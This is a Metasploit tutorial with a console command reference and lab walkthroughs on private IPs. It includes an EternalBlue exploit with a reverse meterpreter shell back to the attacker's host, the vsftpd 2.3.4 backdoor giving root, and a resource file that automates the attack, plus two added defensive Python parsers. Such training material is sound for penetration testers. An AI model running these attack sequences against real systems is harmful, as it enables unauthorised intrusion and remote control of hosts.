The Metasploit Framework contains hundreds of modules. To use it well we need to master a number of specific console commands that help us during a penetration test.

MSF console commands

show exploits: list all exploit modules in the Metasploit Framework

show auxiliary: list all auxiliary modules in the Metasploit Framework

show options: options are the settings each module in the Metasploit Framework needs in order to run correctly

If no module has been selected, show options displays the global options that can be modified; once inside a module, show options displays the options that particular module needs set. The back command returns to the previous Metasploit context.

msf5 > show options 

Global Options:
===============

Option Current Setting Description
------ --------------- -----------
ConsoleLogging false Log all console input and output
LogLevel 0 Verbosity of logs (default 0, max 3)
MinimumRank 0 The minimum rank of exploits that will run without explicit confirmation
Prompt msf5 The prompt string
PromptChar > The prompt character
PromptTimeFormat %Y-%m-%d %H:%M:%S Format for timestamp escapes in prompts
SessionLogging false Log all input and output for sessions
TimestampOutput false Prefix all console output with a timestamp

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.


Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > back
msf5 >

When we want to find a particular exploit, auxiliary module or payload, the search command saves time. For example, to find the MS17-010 exploit module, search ms17-010 lists both the auxiliary modules and the exploit modules that match.

msf5 > search ms17-010

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Once the exploit module exploit/windows/smb/ms17_010_eternalblue has been found, load it with the use command, as follows

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) >

Here we selected the exploit/windows/smb/ms17_010_eternalblue module; from now on every command entered at the console runs in the context of this exploit module. Entering show options inside the selected module displays the options the MS17-010 module needs

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.


Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs

show payloads: list all payloads in the Metasploit Framework

Like show options, when run inside a module this command only displays the payloads compatible with the current module. Entering the following command at the top level lists every active payload

msf5 > show payloads

In the previous step we used search to find the MS17-010 exploit module. Now we use the show payloads command to find the payloads that fit this exploit module; it displays payloads for the Windows platform. Metasploit generally works out from the environment which payloads a particular exploit can use; only a small part of the list is reproduced here...

msf5 exploit(windows/smb/ms17_010_eternalblue) > show payloads 

Compatible Payloads
===================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 generic/custom normal No Custom Payload
1 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline

Next we enter set payload windows/x64/meterpreter/reverse_tcp to select the reverse_tcp (reverse TCP connection) payload. Entering show options shows the options that need to be set; in this example the target host can be configured to connect back to a specific IP address and port on the attacking machine, which is why it is called a reverse payload. In the Required column, yes means the option must be set and no means it is optional.

We can see that this payload needs LHOST (local host) and RHOST (remote host) set. Set LHOST to the IP address of our attacking machine; the remote host will connect back to the attacking machine's default TCP port (4444), although the port can of course be chosen. Because this kind of reverse connection suits environments with firewalls and NAT gateways, a common port that firewalls usually allow through (443, 80, 8080 and the like) can be set.

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
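
The Required column is the thing to read before running a module: a required option left blank (RHOSTS and LHOST above) stops the module from running. The following is an added example, not code from the original page or from Metasploit itself: a Python parser that takes a captured show options listing, recovers the column boundaries from the dashed ruler line (so it works for whatever column widths the console prints), and reports every Required option that has no Current Setting. It generalises beyond this page's single listing: any number of Module options and Payload options tables in one capture are handled. The sample text is constructed to reproduce the console's padded column layout, which the web page's extraction collapsed.

```python
"""Parse msfconsole 'show options' tables and flag Required options that are still unset.

Added example; not code from the original page or from Metasploit itself. The sample
below is constructed to match the column layout msfconsole prints (columns padded with
spaces; the ruler line of dashes sits under the header).
"""
import re

# Constructed sample: the 'show options' output for the exploit and payload named on the page.
SAMPLE_SHOW_OPTIONS = """\
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
"""

# "Module options (...)" / "Payload options (...)" lines name the table that follows.
HEADER_RE = re.compile(r"^(Module|Payload) options \((?P<name>[^)]+)\):\s*$")
# A ruler line is nothing but runs of dashes separated by spaces.
RULER_RE = re.compile(r"^\s*-+(\s+-+)*\s*$")


def parse_option_tables(text):
    """Return {section_name: [row_dict, ...]} for every options table in *text*.

    Column boundaries are taken from the dashed ruler under the column header, so the
    parser does not depend on fixed widths. Tables without a Module/Payload header
    (such as the 'Exploit target' table) are skipped.
    """
    tables = {}
    lines = text.splitlines()
    section = None
    i = 0
    while i < len(lines):
        line = lines[i]
        m = HEADER_RE.match(line)
        if m:
            section = m.group("name")
            i += 1
            continue
        if section and i > 0 and RULER_RE.match(line):
            header = lines[i - 1]
            starts = [r.start() for r in re.finditer(r"-+", line)]
            bounds = list(zip(starts, starts[1:] + [None]))  # last column runs to end of line
            names = [header[a:b].strip() for a, b in bounds]
            rows = []
            i += 1
            while i < len(lines) and lines[i].strip():  # table ends at the first blank line
                row = lines[i]
                rows.append({n: row[a:b].strip() for n, (a, b) in zip(names, bounds)})
                i += 1
            tables[section] = rows
            section = None
            continue
        i += 1
    return tables


def missing_required(tables):
    """Return {section: [option names]} for Required options that have no Current Setting."""
    missing = {}
    for section, rows in tables.items():
        unset = [r["Name"] for r in rows
                 if r.get("Required", "").lower() == "yes" and not r.get("Current Setting")]
        if unset:
            missing[section] = unset
    return missing


if __name__ == "__main__":
    for section, names in missing_required(parse_option_tables(SAMPLE_SHOW_OPTIONS)).items():
        print(f"{section}: unset required option(s): {', '.join(names)}")
```

On the sample this reports RHOSTS for the exploit module and LHOST for the payload, exactly the two values the text says must be supplied before exploit will run. The same ruler-based parsing applies to the search and show payloads tables, since the console draws all of them the same way.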

show targets: list the target platforms supported by the exploit or module

show targets lists the platforms the exploit in the current module supports. When several versions or patch levels are involved, we first need to determine the target machine's version and then use set target to specify the Id corresponding to that system version. Below we see that Windows 7 and Server 2008 R2 (x64) All Service Packs is supported

msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets 

Exploit targets:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs

info: display detailed information about the specified exploit or module

Displays detailed information about the specified exploit or module; if the module has already been selected, simply enter info inside it

Method 1:
info exploit/windows/smb/ms17_010_eternalblue
Method 2:
msf5 exploit(windows/smb/ms17_010_eternalblue) > info

set/unset: set and unset

Every option in a Metasploit module has only two states: set or unset. The set command sets an option (and enables it at the same time); the unset command disables the option

setg/unsetg: these two commands set and clear global options; use them for options that are used often but rarely change

save: after setting global options with setg, the save command stores the current settings so they are available the next time the MSF console starts. If the original state needs to be restored, simply delete the corresponding file or move it elsewhere

msf5 exploit(windows/smb/ms17_010_eternalblue) > save
Saved configuration to: /root/.msf4/config

0x02 Attacking with MS17-010

Kali: 192.168.197.193
Target: 192.168.197.195

Step 1: use the search command to find the MS17-010 exploit and auxiliary modules

msf5 > search ms17-010

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Step 2: use the auxiliary module auxiliary/scanner/smb/smb_ms17_010 to confirm whether the target has the vulnerability; a scan result of VULNERABLE to MS17-010 means it does

msf5 > use auxiliary/scanner/smb/smb_ms17_010 
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.197.195
RHOSTS => 192.168.197.195
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 192.168.197.195 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

[+] 192.168.197.195:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.197.195:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
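
The scanner's output is also the artefact a defender or an internal assessment team keeps: the VULNERABLE lines are the hosts that still need the MS17-010 patch. The following is an added example, not code from the original page or from Metasploit itself: a Python script that reads captured smb_ms17_010 output, extracts every vulnerable host with its reported OS banner, groups the hosts by OS for a patch list, and checks the "Scanned N of M hosts" progress line so that an empty result is not mistaken for a clean result when the scan did not finish. The first vulnerable line is copied from the page; the second host and the progress lines are constructed in the same format.

```python
"""Turn smb_ms17_010 scanner output into a patch/triage list.

Added example; not code from the original page or from Metasploit. The line format is the
one shown on the page; 192.168.197.201 and the progress lines are constructed samples.
"""
import re
from collections import defaultdict

# Constructed sample: one line copied from the page, one extra host made up for illustration.
SAMPLE_SCAN = """\
[+] 192.168.197.195:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[+] 192.168.197.201:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.197.195:445 - Scanned 1 of 2 hosts (50% complete)
[*] 192.168.197.201:445 - Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
"""

# Matches the scanner's positive finding: "[+] host:port - Host is likely VULNERABLE to MS17-010! - <os>"
VULN_RE = re.compile(
    r"^\[\+\] (?P<host>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+) - "
    r"Host is likely VULNERABLE to MS17-010! - (?P<os>.+)$"
)
# Matches the per-host progress line so completeness can be verified.
PROGRESS_RE = re.compile(r"Scanned (?P<done>\d+) of (?P<total>\d+) hosts")


def parse_scan(text):
    """Return (vulnerable, scanned, total).

    vulnerable: list of {host, port, os} dicts in the order the scanner reported them.
    scanned/total: taken from the last progress line seen, so a caller can tell whether
    the scan actually finished before trusting an empty result.
    """
    vulnerable, scanned, total = [], 0, 0
    for line in text.splitlines():
        m = VULN_RE.match(line)
        if m:
            vulnerable.append({"host": m["host"], "port": int(m["port"]), "os": m["os"].strip()})
            continue
        p = PROGRESS_RE.search(line)
        if p:
            scanned, total = int(p["done"]), int(p["total"])
    return vulnerable, scanned, total


def group_by_os(vulnerable):
    """Group vulnerable hosts by the OS banner the scanner reported (one patch list per build)."""
    groups = defaultdict(list)
    for entry in vulnerable:
        groups[entry["os"]].append(entry["host"])
    return dict(groups)


def triage_report(text):
    """Build a report dict: whether the scan finished, per-OS host lists, and the total count."""
    vulnerable, scanned, total = parse_scan(text)
    return {
        "complete": total > 0 and scanned == total,
        "by_os": group_by_os(vulnerable),
        "count": len(vulnerable),
    }


if __name__ == "__main__":
    report = triage_report(SAMPLE_SCAN)
    print("scan complete:", report["complete"])
    for os_name, hosts in report["by_os"].items():
        print(f"{os_name}: {', '.join(hosts)}")
```

Lines that do not match the positive pattern (the "Scanned ... hosts" and "Auxiliary module execution completed" lines) are simply ignored, so a capture that contains no VULNERABLE line yields an empty host list, and "complete" is False whenever no progress line reached the total.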

Step 3: use the use command to load the exploit module exploit/windows/smb/ms17_010_eternalblue and set the corresponding options

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.197.195
RHOSTS => 192.168.197.195
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.197.193
LHOST => 192.168.197.193
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.197.195 yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.197.193 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs

set RHOSTS specifies the target host's IP address. Next the payload is set with set payload windows/x64/meterpreter/reverse_tcp; after a successful attack this payload makes the target host initiate a reverse connection to the IP address given in LHOST. Because the shell is sent back to the attacking machine, LHOST is set to the attacker's IP.

Step 4: use the exploit command to initialise the attack environment and launch the attack against the target host; on success it returns a reverse_tcp meterpreter session

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.197.193:4444
[+] 192.168.197.195:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.197.195:445 - Connecting to target for exploitation.
[+] 192.168.197.195:445 - Connection established for exploitation.
[+] 192.168.197.195:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.197.195:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.197.195:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.197.195:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 192.168.197.195:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 192.168.197.195:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.197.195:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.197.195:445 - Sending all but last fragment of exploit packet
[*] 192.168.197.195:445 - Starting non-paged pool grooming
[+] 192.168.197.195:445 - Sending SMBv2 buffers
[+] 192.168.197.195:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.197.195:445 - Sending final SMBv2 buffers.
[*] 192.168.197.195:445 - Sending last fragment of exploit packet!
[*] 192.168.197.195:445 - Receiving response from exploit packet
[+] 192.168.197.195:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.197.195:445 - Sending egg to corrupted connection.
[*] 192.168.197.195:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.197.195
[*] Meterpreter session 1 opened (192.168.197.193:4444 -> 192.168.197.195:65118) at 2020-02-14 13:46:51 +0800
[+] 192.168.197.195:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.197.195:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.197.195:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

The sessions -l command lists the meterpreter sessions running on remote hosts; sessions -l -v shows detailed information about each meterpreter session

msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions 

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN-LTME4DTVE8Q 192.168.197.193:4444 -> 192.168.197.195:65118 (192.168.197.195)

msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -l -v

Active sessions
===============

Session ID: 1
Name:
Type: meterpreter windows
Info: NT AUTHORITY\SYSTEM @ WIN-LTME4DTVE8Q
Tunnel: 192.168.197.193:4444 -> 192.168.197.195:65118 (192.168.197.195)
Via: exploit/windows/smb/ms17_010_eternalblue
Encrypted: true
UUID: d32a7409c7ab99a4/x64=2/windows=1/2020-02-14T05:46:51Z
CheckIn: 21s ago @ 2020-02-14 13:49:54 +0800
Registered: No

sessions -i 1 interacts with the control session whose ID is 1; entering shell drops into an interactive command shell on the target system

msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3388 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>whoami

0x03 Testing Metasploitable

In this example we scan first, then test using vsftpd

Step 1: scan with nmap

msf5 > nmap -sT -A -PO 192.168.197.197
[*] exec: nmap -sT -A -PO 192.168.197.197

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-14 14:05 CST
Nmap scan report for 192.168.197.197
Host is up (0.046s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

Step 2: search for the vsftpd exploit module and configure the required options

msf5 > search vsftpd

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution


msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 cmd/unix/interact normal No Unix Command, Interact with Established Connection

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.197.197
RHOSTS => 192.168.197.197
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.197.197 yes The target address range or CIDR identifier
RPORT 21 yes The target port (TCP)

Step 3: run it with the exploit command. Here we used a bind-style interactive shell: it opens a listening port on the target host so that we can connect directly to the target system. For a host behind a firewall or NAT gateway, a reverse-connection payload should be used instead

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit 

[*] 192.168.197.197:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.197.197:21 - USER: 331 Please specify the password.
[+] 192.168.197.197:21 - Backdoor service has been spawned, handling...
[+] 192.168.197.197:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.197.193:46319 -> 192.168.197.197:6200) at 2020-02-14 14:14:43 +0800

whoami
root
id
uid=0(root) gid=0(root)

0x04 Resource files

A resource file is a script containing a series of automated commands for the MSF console. These files are a list of commands that can be executed in the MSF console; the commands in the list run in order. Two examples follow

1. Create and run a resource file that displays the Metasploit version

root@kali:~# echo version >resource.rc
root@kali:~# echo load sounds >>resource.rc
root@kali:~# msfconsole -r resource.rc
......
[*] Processing resource.rc for ERB directives.
resource (resource.rc)> version
Framework: 5.0.46-dev
Console : 5.0.46-dev
resource (resource.rc)> load sounds
[*] Successfully loaded plugin: sounds
[*] Starting persistent handler(s)...

2. Create and run a resource file for the MS17-010 attack

root@kali:~# echo use exploit/windows/smb/ms17_010_eternalblue > pentest.rc
root@kali:~# echo set RHOSTS 192.168.197.195 >> pentest.rc
root@kali:~# echo set payload windows/x64/meterpreter/reverse_tcp >> pentest.rc
root@kali:~# echo set LHOST 192.168.197.193 >> pentest.rc
root@kali:~# echo exploit >> pentest.rc
root@kali:~# msfconsole -r pentest.rc
......
meterpreter >

0x05 MSF console command reference

search: search for exploit or auxiliary modules; both fuzzy and exact searches are possible

show exploits: list all exploit modules in the Metasploit Framework

show payloads: list all payloads in the Metasploit Framework

show auxiliary: list all auxiliary modules in the Metasploit Framework

search name: find all exploits and other modules in the Metasploit Framework matching name

info: display information about the specified exploit or module

use name: load an exploit or module

LHOST: the local IP address the target host can connect back to; when the target is not on the same LAN this usually has to be a public IP address. Used by reverse shells

RHOST: the remote host, i.e. the target host

set function: set a specific option, such as the local or remote host

setg function: set a specific option globally, such as the local or remote host

show options: list all options of an exploit or module

show targets: list the platforms the exploit supports

set target num: specify the operating system and patch level of the target, if known

set payload payload: specify the payload to use

show advanced: list all advanced options

set autorunscript migrate -f: automatically migrate to another process after the exploit completes

check: check whether the target is vulnerable to the selected exploit

exploit: run the exploit or module against the target

exploit -j: run the exploit as a job (the attack runs in the background)

exploit -z: do not interact with the session after a successful exploit

exploit -e encoder: specify the payload encoder to use

exploit -h: show help for the exploit command

sessions -l: list the available interactive sessions (used when handling multiple shells)

sessions -l -v: list all available interactive sessions with details, such as which vulnerability was used to attack the system

sessions -s script: run a specific Meterpreter script in all active Meterpreter sessions

sessions -K: kill all active interactive sessions

sessions -c cmd: run a command on all active Meterpreter sessions

sessions -u sessionID: upgrade a plain Win32 shell to a Meterpreter shell

db_create name: create the database used by database-driven attacks

db_connect name: create and connect to the database used by database-driven attacks

workspace: list all workspaces in the currently connected database

workspace name: switch to the specified workspace

workspace -a name: create a workspace

workspace -d name: delete the specified workspace

workspace -D: delete all workspaces

workspace -r old new: rename a workspace

db_nmap: run nmap and store the scan data in the database

db_rebuild_cache: rebuild the database cache so that later searches are faster

db_disconnect: disconnect from the current database

db_connect: connect to the specified database (/usr/share/metasploit-framework/config/database.yml)

db_import: import into the database

db_export -f: export in the specified format

route: route traffic through the specified session

References

Metasploit: The Penetration Tester's Guide